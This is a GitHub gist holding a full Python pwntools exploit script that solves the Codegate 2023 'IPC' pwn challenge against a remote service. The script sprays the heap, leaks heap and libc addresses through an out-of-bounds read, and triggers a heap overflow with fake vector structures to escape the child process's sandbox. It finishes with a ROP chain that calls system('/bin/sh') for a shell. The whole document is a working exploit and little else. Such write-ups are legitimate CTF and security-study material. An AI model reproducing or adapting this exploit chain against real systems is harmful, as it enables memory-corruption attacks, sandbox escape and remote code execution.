Skip to content

Instantly share code, notes, and snippets.

@vngkv123
Created June 19, 2023 02:24
Show Gist options
  • Save vngkv123/6491117f2ed841efb0c73fd420312eab to your computer and use it in GitHub Desktop.
Save vngkv123/6491117f2ed841efb0c73fd420312eab to your computer and use it in GitHub Desktop.
codegate2023 pwn-IPC solution
#!/usr/bin/python3
from pwn import *
import time
import subprocess
import sys
SPRAYLENGTH = 0x1000
def OFFSET(value):
assert(value != 0)
return 0x10000000000000000 + value
def powSolver(p):
# hashcash -mb28 ibqkhrhi
command = p.recvline()[:-1]
log.info("Current hashcash pow command: {}".format(command))
output = subprocess.check_output(command.split(b" "))
p.sendline(output)
class CTF:
def __init__(self, path):
# self.p = process(path)
self.p = remote("3.35.171.76", 9000)
context.log_level = "debug"
powSolver(self.p)
self.remote = True
self.progress = log.progress("Status")
self.direction = {
"CHILD": 0,
"PARENT": 1,
}
self.action = {
"DECODE": 0,
"CONTINUE": 1,
"EXIT": 2
}
self.types = {
"UINT64": 0,
"INT64": 1,
"STRING": 2,
"BOOL": 3,
"RPC": 4,
}
self.calls = {
"READMSG": 0,
"SENDMSG": 1,
"PRINTMSG": 2,
"DISABLE": 3,
"NOP": 4,
}
self.printType = {
"ASSTR": 0,
"ASBYTES": 1,
}
self.readCount = 0
self.pendingIndex = 0
self.heap = 0
self.code = 0
self.libc = 0
self.shmemMessageAddress = 0
# Common Utilities for exploit
def updateProgress(self, msg):
self.progress.status(msg)
# Specific exploit strategies
def encodeUINT64(self, data):
encodeData = b""
encodeData += p32(self.types["UINT64"])
encodeData += p64(data)
return encodeData
def encodeINT64(self, data):
encodeData = b""
encodeData += p32(self.types["INT64"])
encodeData += p64(data)
return encodeData
def encodeBOOLEAN(self, data):
encodeData = b""
encodeData += p32(self.types["BOOL"])
encodeData += p8(data)
return encodeData
def encodeSTRING(self, data):
encodeData = b""
encodeData += p32(self.types["STRING"])
encodeData += p64(len(data))
encodeData += data
return encodeData
def memoryAllocate(self, size, PAD = b"A"):
assert(size > 8)
data = b""
data += p32(0xdadadada)
data += p32(self.action["CONTINUE"])
data += PAD * (size - len(data) - 8)
payload = p64(len(data) + 8) + data
self.p.send(payload)
self.pendingIndex += 1
def memoryDeallocate(self, index, recv=True):
data = b""
data += p32(0xcafebabe)
data += p32(self.action["DECODE"])
data += p64(self.types["RPC"])
# deserialization count
data += p32(1)
# rpcAction
data += p32(self.calls["READMSG"])
# deserialization data
data += self.encodeUINT64(index)
payload = p64(len(data) + 8) + data
self.p.send(payload)
if recv:
self.p.recvuntil(b"receive error")
def readOffset(self, offset):
data = b""
data += p32(0x13371337)
data += p32(self.action["DECODE"])
data += p64(self.types["RPC"])
# deserialization count
data += p32(4)
# rpcAction
data += p32(self.calls["PRINTMSG"])
# deserialization data
message = b"a" * SPRAYLENGTH
data += self.encodeUINT64(len(message)) # length
data += self.encodeINT64(OFFSET(offset)) # offset
data += self.encodeINT64(self.printType["ASBYTES"]) # print type
data += self.encodeSTRING(message) # data
payload = p64(len(data) + 8) + data
self.p.send(payload)
self.p.recvuntil(b"Decode is received")
def CRASH(self):
data = b""
data += p32(0x13371337)
data += p32(self.action["DECODE"])
data += p64(self.types["RPC"])
# deserialization count
data += p32(4)
# rpcAction
data += p32(self.calls["PRINTMSG"])
# deserialization data
message = b"a" * SPRAYLENGTH
data += self.encodeUINT64(len(message)) # length
data += self.encodeINT64(0x8100000000000000) # offset
data += self.encodeINT64(self.printType["ASBYTES"]) # print type
data += self.encodeSTRING(message) # data
payload = p64(len(data) + 8) + data
self.p.send(payload)
self.p.recvuntil(b"System page size: 4096\n")
def read32(self, address):
assert(self.heap != 0)
offset = 0
if address < self.heap:
offset = self.heap - address
offset = -offset
else:
offset = self.heap - address
self.readCount += 1
self.readOffset(offset - (0x1120 * self.readCount))
self.p.recvuntil(b"0x000000: ")
leakMem = self.p.recv(2 * 8 + 8)
leakMem = leakMem.replace(b" ", b"")
leakMem = u32(bytes.fromhex(leakMem.decode("utf-8")))
self.p.recvuntil(b"msgID: 0x13371337")
return leakMem
def read64(self, address):
assert(self.heap != 0)
offset = 0
if address < self.heap:
offset = self.heap - address
offset = -offset
else:
offset = self.heap - address
self.readCount += 1
self.readOffset(offset - (0x1120 * self.readCount))
self.p.recvuntil(b"0x000000: ")
leakMem = self.p.recv(2 * 8 + 8)
leakMem = leakMem.replace(b" ", b"")
leakMem = u64(bytes.fromhex(leakMem.decode("utf-8")))
self.p.recvuntil(b"msgID: 0x13371337")
return leakMem
def readStr(self, address):
assert(self.heap != 0)
offset = 0
if address < self.heap:
offset = self.heap - address
offset = -offset
else:
offset = address - self.heap
offset = -offset
self.readCount += 1
self.readOffset(offset - (0x1120 * self.readCount))
self.p.recvuntil(b"0x000000: ")
leakMem = self.p.recv(2 * 8 + 8)
leakMem = leakMem.replace(b" ", b"")
leakMem = bytes.fromhex(leakMem.decode("utf-8"))
self.p.recvuntil(b"msgID: 0x13371337")
return leakMem
def prepareExploit(self):
# context.log_level = "debug"
self.updateProgress("Running prepare exploit...")
# length(8) | dataLength(4) | msgID(4) | action(4) | msgType(4)
for i in range(10):
self.memoryAllocate(SPRAYLENGTH, PAD = p8(0x41 + i))
for i in range(10):
self.memoryAllocate(0x200, PAD = p8(0x61 + i))
self.memoryDeallocate(0)
self.memoryDeallocate(2)
return True
def leakMemory(self):
self.updateProgress("Leaking memory...")
self.readOffset(-SPRAYLENGTH)
self.p.recvuntil(b"0x000fe0: ")
leakMem = self.p.recv(2 * 8 + 8)
leakMem = leakMem.replace(b" ", b"")
leakMem = u64(bytes.fromhex(leakMem.decode("utf-8")))
self.heap = leakMem + 0x1060
log.info("First leaked memory: {}".format(hex(self.heap)))
# heap base
searchBase = self.heap - 0x131a0
log.info("Trying to find code base and libc... start from {}".format(hex(searchBase)))
leakMem = self.read64(searchBase + 0x11ef0)
# libc base
log.info("leaked adjacent libc: {}".format(hex(leakMem)))
self.libc = leakMem - 0x7ff620 + 0x1000000
log.info("libc address: {}".format(hex(self.libc)))
return True
def triggerOverflow(self, message, length, paddData=None):
data = b""
data += p32(0x13371337)
data += p32(self.action["DECODE"])
data += p64(self.types["RPC"])
# deserialization count
data += p32(5)
# rpcAction
data += p32(self.calls["SENDMSG"])
# deserialization data
data += self.encodeUINT64(self.direction["PARENT"]) # direction
data += self.encodeUINT64(length - 0x18) # buffer length
data += self.encodeUINT64(1) # encode object count
data += self.encodeUINT64(self.types["STRING"]) # type
# padding bytes
paddBytes = b""
if paddData is not None:
paddBytes += paddData
paddBytes += b"x" * ((length - 0x24) - len(paddBytes))
else:
paddBytes += b"x" * (length - 0x24)
assert(len(paddBytes) == (length - 0x24))
data += self.encodeSTRING(paddBytes + message) # encode data
payload = p64(len(data) + 8) + data
self.p.send(payload)
self.p.recvuntil(b"Decode is received")
time.sleep(0.5)
# we need to make stable R/W primitive
# TODO: implements encode logic and second vulnerability
def getStage1Flag(self):
self.updateProgress("Getting a stage1 flag...")
self.memoryDeallocate(14)
self.memoryDeallocate(12)
self.memoryDeallocate(10)
message = b""
message += p64(0x215) + p64(0x1f8) + p64(0xc0465324) + p64(4)
stage1memory = self.libc - 0x800000 + 0x28
# stage1memory = self.read64(stage1memory)
log.info("Gussed stage1 flag memory: {}".format(hex(stage1memory)))
# first member should be vector pointer
fakeVector = b""
fakeVector += p64(stage1memory)
message += fakeVector
self.triggerOverflow(message, 0x200)
self.memoryDeallocate(13, False)
self.p.recvuntil(b"Pended decode is received\n")
log.info("stage1 flag: {}".format(self.p.recvuntil(b"\n").decode("utf-8")))
return True
def memoryRead(self, address):
self.CRASH()
time.sleep(1)
for i in range(10):
self.memoryAllocate(0x200, PAD = p8(0x61 + i))
self.memoryDeallocate(4)
self.memoryDeallocate(2)
self.memoryDeallocate(0)
message = b""
message += p64(0x215) + p64(0x1f8) + p64(0xc0465324) + p64(4)
log.info("Trying to leaking value at {}".format(hex(address)))
# first member should be vector pointer
fakeData = b""
fakeData = p64(address) + p64(0x1000) + p64(0) * 4
fakeVector = b""
fakeVector += p64(self.shmemMessageAddress)
message += fakeVector
self.triggerOverflow(message, 0x200, fakeData)
self.memoryDeallocate(5, False)
self.p.recvuntil(b"Pended decode is received\n")
leakedData = u64(self.p.recvuntil(b"\n")[:-1].ljust(8, b"\x00"))
log.info("Leaked memory at {}: {}".format(hex(address), hex(leakedData)))
return leakedData
def exitMessage(self):
data = b""
data += p32(0x13371337)
data += p32(self.action["EXIT"])
data += p64(self.types["RPC"])
data += b"A" * 0x100
payload = p64(len(data) + 8) + data
self.p.send(payload)
def exploitParent(self):
self.updateProgress("Exploit parent process...")
for i in range(10):
self.memoryAllocate(0x200, PAD = p8(0x61 + i))
self.memoryDeallocate(4)
self.memoryDeallocate(2)
self.memoryDeallocate(0)
# array's index pos => +0x800
parentMessageQueue = self.libc - 0x800000 + 0x848
shmemMessageAddress = self.libc - 0x800000 + (4 << 20) + 0x2c
self.shmemMessageAddress = shmemMessageAddress
log.info("Parnet message queue address: {}".format(hex(parentMessageQueue)))
log.info("Shared message address: {}".format(hex(shmemMessageAddress)))
fakeData = b""
# message
fakeData += p64(shmemMessageAddress + 0x10)
# m_index
fakeData += p64(0x100)
# fake message data
fakeData += p64(0x1000)
# msgID
fakeData += p32(0x13371337)
# action
fakeData += p32(self.action["DECODE"])
# msgType
fakeData += p64(self.types["RPC"])
# deserialization count
fakeData += p32(0)
# rpcAction
fakeData += p32(self.calls["DISABLE"])
payload = b""
payload += p64(0x215) + p64(0x1f8) + p64(0xc1465324) + p64(4)
# dst (last message and index)
payload += p64(parentMessageQueue + 0x7f8)
payload += p64(1) * 2
# src
payload += p64(shmemMessageAddress)
# length
payload += p64(0x10)
self.triggerOverflow(payload, 0x200, fakeData)
self.memoryDeallocate(3, False)
# crash child process again, but newly created child doesn't have sandbox.
time.sleep(1)
# read process stack address to do ROP
offset = 0
if self.remote is True:
offset += 0xeb000
stackAddress = self.libc - 0x800000 + 0x1050
stackAddress = self.memoryRead(stackAddress)
# reload child process
self.CRASH()
# get shell from child process
for i in range(10):
self.memoryAllocate(0x200, PAD = p8(0x61 + i))
time.sleep(0.5)
self.memoryDeallocate(4)
self.memoryDeallocate(2)
self.memoryDeallocate(0)
time.sleep(0.5)
realServerOffsetVariant = 0x1000
system = self.libc + 0x50d60 + offset + realServerOffsetVariant
binsh = self.libc + 0x1d8698 + offset + realServerOffsetVariant
log.info("stack address: {}".format(hex(stackAddress)))
log.info("libc's system: {}, /bin/sh: {}".format(hex(system), hex(binsh)))
fakeData = b""
# fake message data
# 0x0000000000125bae : xor ebp, ebp ; pop rax ; pop rdi ; call rax
fakeData += p64(self.libc + 0x0000000000125bae + offset + realServerOffsetVariant)
# system
fakeData += p64(system)
# /bin/sh
fakeData += p64(binsh)
# dst (last message and index)
payload = b""
payload += p64(0x215) + p64(0x1f8) + p64(0xc1465324) + p64(4)
payload += p64(stackAddress + 0x18) # overwrite target
payload += p64(1) * 2
# src
payload += p64(shmemMessageAddress)
# length
payload += p64(len(fakeData))
self.triggerOverflow(payload, 0x200, fakeData)
# pause()
self.memoryDeallocate(5, False)
# self.p.recvuntil(b"Done with meessage receive msgID: 0xc1465324")
return True
def run(self):
if self.prepareExploit() is False: return False
if self.leakMemory() is False: return False
if self.getStage1Flag() is False: return False
if self.exploitParent() is False: return False
self.p.interactive()
return True
if __name__ == "__main__":
solver = CTF("../prob/for_organizer/build/IPC")
if solver.run() is True:
solver.updateProgress("Exploit success")
else:
solver.updateProgress("Exploit fail")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment